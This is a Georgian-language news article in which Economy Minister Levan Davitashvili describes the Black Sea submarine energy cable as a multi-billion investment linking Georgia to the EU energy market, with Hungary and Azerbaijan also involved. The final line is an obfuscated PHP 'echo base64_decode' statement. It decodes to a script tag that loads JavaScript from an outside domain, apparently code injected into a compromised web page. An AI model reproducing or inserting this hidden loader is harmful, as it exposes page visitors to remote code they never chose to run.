celsiusi
ავერსი შნაიდერი
როდესაც ვსაუბრობთ ზღვისქვეშა დამაკავშირებელ კაბელზე, ეს არის რამდენიმე მილიარდიანი ძალიან მნიშვნელოვანი ინვესტიცია, რომელსაც შეიძლება, ტრანსფორმაციული შედეგი ჰქონდეს მთლიანად რეგიონის ენერგოუსაფრთხოების, დამოუკიდებლობისა და კონკურენტუნარიანობის კუთხით, – ამის შესახებ ეკონომიკის მინისტრმა, ლევან დავითაშვილმა შავი ზღვის კაბელზე საუბრისას განაცხადა.
მინისტრის თქმით, შავი ზღვის კაბელი არის ერთ-ერთი მორიგი მნიშვნელოვანი ენერგეტიკული პროექტი, რომელიც ქვეყნის ენერგოსექტორს კიდევ უფრო მიმზიდველს გახდის.
„დღეს საქართველო საინტერესოა ენერგეტიკულ სექტორში ინვესტიციების კუთხით, განსაკუთრებით მას შემდეგ, რაც მთავრობამ წინა კვირას დაამტკიცა მხარდაჭერის მექანიზმი, რომელიც დეველოპერებს საშუალებას მისცემს, მცირე და საშუალო პროექტები განახორციელონ, მოიზიდონ დამატებითი ინვესტიციები. როდესაც ვსაუბრობთ ზღვისქვეშა დამაკავშირებელ კაბელზე, ეს არის რამდენიმე მილიარდიანი ძალიან მნიშვნელოვანი ინვესტიცია, რომელსაც შეიძლება, ტრანსფორმაციული შედეგი ჰქონდეს მთლიანად რეგიონის ენერგოუსაფრთხოების, დამოუკიდებლობისა და კონკურენტუნარიანობის კუთხით. ეს არის პირდაპირი კავშირი საქართველოსა და ევროკავშირს შორის. საქართველო, როგორც ენერგოგაერთიანების წევრი ქვეყანა პირდაპირ ევროპულ ენერგობაზარზე გასვლის შესაძლებლობას მიიღებს. შესაბამისად, ნებისმიერი ინვესტორისთვის საქართველოს განახლებადი ენერგიების პროექტები კიდევ უფრო მიმზიდველი იქნება. ჩვენ კიდევ უფრო მარტივად შეგვეძლება ინვესტიციების მოზიდვა ენერგეტიკულ სფეროში“, – განაცხადა დავითაშვილმა.
ეკონომიკის მინისტრის განცხადებით, შავი ზღვის კაბელს გააჩნია არა მხოლოდ ლოკალური, არამედ საერთაშორისო მნიშვნელობა.
„სწორედ ამაზე საუბრობდა კომისარი ვარჰეი, ეს ევროპის ენერგეტიკული უსაფრთხოებისთვისაც მნიშვნელოვანი პროექტია, შესაბამისად საქართველო ამ პროექტით ინტეგრირდება ევროკავშირში, ეს ჩვენი ევროინტეგრაციის გზაზე არის მნიშვნელოვანი ნაბიჯი. პროექტში ჩართული იქნებიან უნგრეთი და აზერბაიჯანიც. ოთხი ქვეყანა თანამშრომლობს ამ პროექტის განხორციელებაში, რადგან საუბარია არა მხოლოდ საქართველოს ენერგორესურსების ექსპორტზე, არამედ მეზობელი აზერბაიჯანის ექსპორტზე და საჭიროების შემთხვევაში იმპორტზეც, რაც ბალანსს კიდევ უფრო გაზრდის, კიდევ უფრო სტაბილურს გახდის რეგიონის და ევროკავშირის ენერგო სისტემებს. რაც შეეხება კვლევას, პირველი ეტაპი დახურა კომპანიამ. ჩვენ იანვარში გვექნება განახლებული ინფორმაცია და დაიგეგმება უშუალო სამუშაოები გეოლოგიის მიმართულებით, რომ არსებობდეს სრულყოფილი პროექტი და შევძლოთ იმპლემენტაციის ეტაპზე გადასვლას“, – განაცხადა ლევან დავითაშვილმა.
261
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");